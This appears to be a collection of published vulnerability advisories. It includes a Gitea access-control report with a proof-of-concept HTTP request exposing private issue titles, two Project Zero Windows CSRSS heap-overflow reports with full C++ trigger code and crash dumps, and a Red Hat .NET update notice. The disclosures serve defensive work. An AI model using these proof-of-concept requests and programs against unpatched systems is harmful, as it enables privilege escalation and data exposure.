In Gitea before 1.16.9, it was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea (there was no permission check for fetching the issue). As a result, the attacker would get access to private issue titles.

**Advisory ID**: usd-2022-0015  
**Product**: Gitea  
**Affected Version**: < 1.16.9  
**Vulnerability Type**: CWE-284: Improper Access Control  
**Security Risk**: Medium  
**Vendor URL**: https://gitea.io/  
**Vendor Status**: Fixed  
**Advisory Status**: Closed  
**CVE number**: Pending  
**CVE Link**: Pending  
**First Published**: 2022-08-12  
**Last Update**: 2022-08-12

**Description**

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea. As a result, the attacker would get access to private issue titles.

**Proof of Concept**

The issue with ID **7** in the example below is an issue from a private repository of another user.  
The project with ID **3** is the attackers project.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: \*/\*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close
\_csrf=tvK\_ourfR\_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue\_ids=7&id=3

The attacker can see the issue (without body text).

**Fix**

It is recommended to restrict access to sensitive functions or information by default.  
Required access privileges should be granted explicitly by a global access control mechanism.

**References**

*   https://cwe.mitre.org/data/definitions/284.html
*   https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

**Timeline**

*   **2022-06-22**: vulnerability identified by Christian Pöschl
*   **2022-06-22**: First contact request
*   **2022-07-01**: Investigation started by vendor
*   **2022-07-12**: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/
*   **2022-07-15**: Vendor confirms remediation
*   **2022-08-12**: This advisory is published

**Credits**

This security vulnerability was identified by Christian Pöschl of usd AG.

CVE-2022-38183: usd-2022-0015 | Broken Access Control in Gitea - usd HeroLab

A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.

**Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow**

    Windows: heap buffer overflow in sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILS```__int64 __fastcall BaseSrvActivationContextCacheDuplicateUnicodeString(UNICODE_STRING *Dst, UNICODE_STRING *Src){  unsigned int Length; // ebx  SIZE_T NewMaxLength; // r8  WCHAR *Heap; // rax  __int64 Status; // rax  Length = Src->Length;  if ( (_WORD)Length )  {    NewMaxLength = (unsigned __int16)(Length + 2); // *** 1 ***    Dst->MaximumLength = NewMaxLength;    Heap = (WCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, NewMaxLength); // *** 2 ***    Dst->Buffer = Heap;    if ( Heap )    {      memcpy_0(Heap, Src->Buffer, Length); // *** 3 ***      Dst->Buffer[(unsigned __int64)Length >> 1] = 0;      Status = 0i64;      Dst->Length = Length;    }    else    {      return 0xC0000017i64;    }  }  else  {    *(_DWORD *)&Dst->Length = 0;    Status = 0i64;    Dst->Buffer = 0i64;  }  return Status;}```The function above attempts to reserve two extra bytes for a trailing null character. The new size gets truncated to a 16-bit value[1], so if the size of the source string is 0xfffe bytes, the function will try to allocate a 0-byte buffer[2] and copy 0xfffe bytes into it[3].The vulnerable function is reachable from the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine. However, the default size of the CSR shared memory section is only 0x10000 bytes, and some of that space must be reserved for the capture buffer header, so by default it's impossible to pass a big enough `UNICODE_STRING` to CSRSS. Luckily, the size of the section is controlled entirely by the client process, and if an attacker can modify `ntdll!CsrpConnectToServer` early enough during process startup, they'll be able to pass strings of (virtually) any size.## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASEThis (not very reliable) proof-of-concept creates a new process in a suspended state, attempts to find and replace 32-bit value 0x10000 inside `CsrpConnectToServer`, and resumes the process' main thread. Then the child process sends a CSR request with a huge string.1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#include <windows.h>#include <winternl.h>#include <string>PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0,                   size_t max_length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main(int argc, char* argv[]) {  HMODULE ntdll = LoadLibrary(L\"ntdll\");  if (argc == 1) {    STARTUPINFO si = {0};    PROCESS_INFORMATION pi = {0};    si.cb = sizeof(si);    WCHAR image_path[MAX_PATH + 1];    GetModuleFileName(NULL, image_path, MAX_PATH);    std::wstring args = image_path;    args += L\" child\";    CreateProcess(&image_path[0], &args[0], NULL, NULL, FALSE, CREATE_SUSPENDED,                  NULL, NULL, &si, &pi);    PVOID csrClientConnectToServer =        GetProcAddress(ntdll, \"CsrClientConnectToServer\");    size_t offset = 0;    for (; offset < 0x1000; ++offset)      if (*(uint32_t*)((char*)csrClientConnectToServer + offset) == 0x10000)        break;    uint32_t new_size = 0x20000;    WriteProcessMemory(pi.hProcess, (char*)csrClientConnectToServer + offset,                       &new_size, sizeof(new_size), NULL);    ResumeThread(pi.hThread);  } else {#define INIT_PROC(name) \\  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));    INIT_PROC(CsrAllocateCaptureBuffer);    INIT_PROC(CsrFreeCaptureBuffer);    INIT_PROC(CsrClientCallServer);    INIT_PROC(CsrCaptureMessageString);    const size_t HEADER_SIZE = 0x40;    uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;    SET_FIELD(0, 0x900000041);    SET_FIELD(3, 0x10101);    SET_FIELD(6, 0x88);    SET_FIELD(7, -1);    std::string manifest =        \"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \"        \"manifestVersion='1.0'>\"        \"<assemblyIdentity name='A' version='1.0.0.0'/>\"        \"</assembly>\";    SET_FIELD(8, manifest.c_str());    SET_FIELD(9, manifest.size());    SET_FIELD(22, 1);    PVOID capture_buffer = CsrAllocateCaptureBuffer(3, 0x10200);    CaptureString(capture_buffer, FIELD(1), L\"\\x00\\x00\", 2);    CaptureString(capture_buffer, FIELD(4), L\"C:\\\\Windows\\\otepad.exe\");    CaptureString(capture_buffer, FIELD(17), L\"C:\\\\A\\\\\");    SET_FIELD(17, 0xfffefffe);    CsrClientCallServer(msg, capture_buffer, 0x1001001e,                        sizeof(msg) - HEADER_SIZE);  }}```4) Wait for a crash:```CONTEXT:  000000bd41a3ddc0 -- (.cxr 0xbd41a3ddc0)rax=000002224855c000 rbx=000000000000fffe rcx=000002224855c010rdx=fffffffff7ecde20 rsi=000000bd41a3ec48 rdi=000000000000ffferip=00007ffbd59d3c53 rsp=000000bd41a3eb08 rbp=000000bd41a3efc8 r8=000000000000002e  r9=00000000000003ff r10=000002224855c000r11=0000022240439e1e r12=00000000000007a4 r13=0000000000000001r14=000000bd41a3ee38 r15=000000bd41a3ee20iopl=0         nv up ei pl nz na po nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206ntdll!memcpy+0x113:0033:00007ffb`d59d3c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:00000222`4855c000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  000002224855c000 EXCEPTION_RECORD:  000000bd41a3e2b0 -- (.exr 0xbd41a3e2b0)ExceptionAddress: 00007ffbd59d3c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 000002224855c000Attempt to write to address 000002224855c000STACK_TEXT:  000000bd`41a3eb08 00007ffb`d2f34f24 : 00000000`00000000 00000000`0000fffe 00000000`00000000 00000000`00000000 : ntdll!memcpy+0x113000000bd`41a3eb10 00007ffb`d2f34e4b : 000000bd`41a3ee20 000000bd`41a3ec30 00000000`00000000 00000222`3a760000 : sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString+0x64000000bd`41a3eb40 00007ffb`d2f34d43 : 00000000`00000000 000000bd`41a3ee20 00000222`47868e20 00007ffb`d2d7b8b4 : sxssrv!BaseSrvActivationContextCacheDuplicateKey+0x4b000000bd`41a3eb70 00007ffb`d2f34916 : 000000bd`41a3ed78 000000bd`41a3ee20 000000bd`41a3efd4 000000bd`41a3efe0 : sxssrv!BaseSrvActivationContextCacheCreateEntry+0x83000000bd`41a3ebd0 00007ffb`d2f34018 : 00000000`00000000 00000000`00000000 00000000`00000000 000000bd`41a3f410 : sxssrv!BaseSrvActivationContextCacheInsertEntry+0x86000000bd`41a3ed20 00007ffb`d2f31dce : 00000000`000007f4 00000000`000000f0 00000000`00010244 00000000`00000000 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x818000000bd`41a3f160 00007ffb`d2fb6490 : 00000222`3d0d0750 00000000`000000f0 00000222`4785ef30 00000222`3a877f80 : sxssrv!BaseSrvSxsCreateActivationContextFromMessage+0x32e000000bd`41a3f2d0 00007ffb`d598265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0000000bd`41a3f970 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project Zero**This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-07-19.**Related CVE Numbers: CVE-2022-22049,CVE-2022-22049.Found by: glazunov@google.com

Windows sxssrv!BaseSrvActivationContextCacheDuplicateUnicodeString Heap Buffer Overflow

**Windows sxs!CNodeFactory::XMLParser\_Element\_doc\_assembly\_assemblyIdentity Heap Buffer Overflow**

    Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity## SUMMARYA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.## VULNERABILITY DETAILSIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.We've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html## VERSIONWindows 11 12H2 (OS Build 22000.593)Windows 10 12H2 (OS Build 19044.1586)## REPRODUCTION CASE1) Enable page heap verification for csrss.exe:```gflags /p /enable csrss.exe /full```2) Restart the machine.3) Compile and run:```#pragma comment(lib, "ntdll")#include <windows.h>#include <winternl.h>#include <cstdint>#include <cstdio>#include <string>typedef struct _SECTION_IMAGE_INFORMATION {  PVOID EntryPoint;  ULONG StackZeroBits;  ULONG StackReserved;  ULONG StackCommit;  ULONG ImageSubsystem;  WORD SubSystemVersionLow;  WORD SubSystemVersionHigh;  ULONG Unknown1;  ULONG ImageCharacteristics;  ULONG ImageMachineType;  ULONG Unknown2[3];} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;typedef struct _RTL_USER_PROCESS_INFORMATION {  ULONG Size;  HANDLE ProcessHandle;  HANDLE ThreadHandle;  CLIENT_ID ClientId;  SECTION_IMAGE_INFORMATION ImageInformation;  BYTE Unknown1[128];} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;NTSTATUS(NTAPI* RtlCreateProcessParameters)(PRTL_USER_PROCESS_PARAMETERS*, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PVOID, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING, PUNICODE_STRING);NTSTATUS(NTAPI* RtlCreateUserProcess)(PUNICODE_STRING, ULONG, PRTL_USER_PROCESS_PARAMETERS, PSECURITY_DESCRIPTOR, PSECURITY_DESCRIPTOR, HANDLE, BOOLEAN, HANDLE, HANDLE, PRTL_USER_PROCESS_INFORMATION);PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);VOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);NTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);NTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);void CaptureString(LPVOID capture_buffer,                   uint8_t* msg_field,                   PCWSTR string,                   size_t length = 0) {  if (length == 0)    length = lstrlenW(string);  CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,                          length * 2 + 2, (PSTR)msg_field);}int main() {  HMODULE ntdll = LoadLibrary(L"ntdll");#define INIT_PROC(name) \  name = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));  INIT_PROC(RtlCreateProcessParameters);  INIT_PROC(RtlCreateUserProcess);  INIT_PROC(CsrAllocateCaptureBuffer);  INIT_PROC(CsrFreeCaptureBuffer);  INIT_PROC(CsrClientCallServer);  INIT_PROC(CsrCaptureMessageString);  UNICODE_STRING image_path;  PRTL_USER_PROCESS_PARAMETERS proc_params;  RTL_USER_PROCESS_INFORMATION proc_info = {0};  RtlInitUnicodeString(&image_path, L"\\SystemRoot\\notepad.exe");  RtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,                             NULL, NULL, NULL, NULL);  RtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,                       NULL, NULL, FALSE, NULL, NULL, &proc_info);  const size_t HEADER_SIZE = 0x40;  uint8_t msg[HEADER_SIZE + 0x1f8] = {0};#define FIELD(n) msg + HEADER_SIZE + 8 * n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;  SET_FIELD(2, proc_info.ClientId.UniqueProcess);  SET_FIELD(3, proc_info.ClientId.UniqueThread);  SET_FIELD(4, -1);  SET_FIELD(7, 1);  SET_FIELD(8, 0x20000);  std::string manifest =      "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' "      "manifestVersion='1.0'>"      "<assemblyIdentity name='@' version='1.0.0.0'/>"      "</assembly>";  manifest.replace(manifest.find('@'), 1, 0x4000, 'A');  SET_FIELD(13, manifest.c_str());  SET_FIELD(14, manifest.size());  PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);  CaptureString(capture_buffer, FIELD(22), L"C:\\Windows\\");  CaptureString(capture_buffer, FIELD(24), L"\x00\x00", 2);  CaptureString(capture_buffer, FIELD(28), L"A");  SET_FIELD(28, 0xff000002);  CsrClientCallServer(msg, capture_buffer, 0x1001001d,                      sizeof(msg) - HEADER_SIZE);}```The crash should look like to the following:```CONTEXT:  0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0)rax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010rdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001rip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 r8=0000000000000032  r9=00000000000001f7 r10=00007ff822e6b558r11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001r14=0000000000000000 r15=0000000000000005iopl=0         nv up ei pl nz na pe nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202ntdll!memcpy+0x113:0033:00007ff8`25a53c53 0f2941f0        movaps  xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????Resetting default scopeWRITE_ADDRESS:  0000020e6515d000EXCEPTION_RECORD:  0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0)ExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)   ExceptionCode: c0000005 (Access violation)  ExceptionFlags: 00000000NumberParameters: 2   Parameter[0]: 0000000000000001   Parameter[1]: 0000020e6515d000Attempt to write to address 0000020e6515d000STACK_TEXT:0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x1130000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c10000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd340000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d60000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x5130000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x1040000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x3390000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x5450000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x710000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f30000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d00000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f```## CREDIT INFORMATIONSergei Glazunov of Google Project ZeroRelated CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.Found by: glazunov@google.com

Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow

Red Hat Security Advisory 2022-6043-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.108 and .NET Runtime 6.0.8.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6043-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6043  
Issue date:        2022-08-10  
CVE Names:         CVE-2022-34716  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.108 and .NET Runtime  
6.0.8.

Security Fix(es):

* dotnet: External Entity Injection during XML signature verification  
(CVE-2022-34716)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2115183 - CVE-2022-34716 dotnet: External Entity Injection during XML signature verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet6.0-6.0.108-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.8-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.108-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.8-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.108-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.8-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.108-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.108-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34716  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvPznNzjgjWX9erEAQhE7g//WmUIKe/mrkqc47qvEzMggFKNbiNuaydm  
OzjMbyvAJcZJewU43OmqEpl6GZpdQ30wN2zJSUlVrC+At+yDBarHmGzsByr0BfQz  
vI4LTAZII7pB/EIFNg6Blpfccpzafp0aLcOlv7YqLUOZAbaESaPrQ2n9yi4bF0m3  
wb9Q8AscyvLM5w2dsJC2/9fnPXs9Ze/eq5YExKnQq+E+K/tqUd/tOWZvZYsHax/c  
NaiyygYicSRf4OGmFsM69p2toI7mFdszlHdtQZmqiNP3lAZlVbRfPGUF8W/pnjmM  
iRj67/yn93MNypabmAKc6LciJS8vVXNCmGREtSVqqIzVwrqDq/CVmq9lDkKfEpvI  
fTBv4OozdKwBI6lHV54FUAX8w/EJElcTxToS3dnQjx/OMZXQaqc3/06oZ/IHMLQ6  
TOVTXUTaZkiV0okWLhZSfIGkpD408kHuW/bTcHsUag/INJ4f3I5j2can3h+Pdqfo  
6bg9ZOblT4rj6Up9fmDgA0eMcAwnoX4PQrkUQwk5vgRDYN/EtfNmNsjYL7PBkYQe  
ojyUdGD+EnvFBUrAsZIqmgkBi9NL92OLAIqNQ37TFKuLF99VGkNyc0Z+rtHrepNI  
54pcFGsNB+BmXhGBk9aIyEquZqnjhWR2xcbYWo267Oub++neEeAaDnnRayBoJq7H  
X7T+kpNjL+w=0gK7  
-----END PGP SIGNATURE-----  
--  
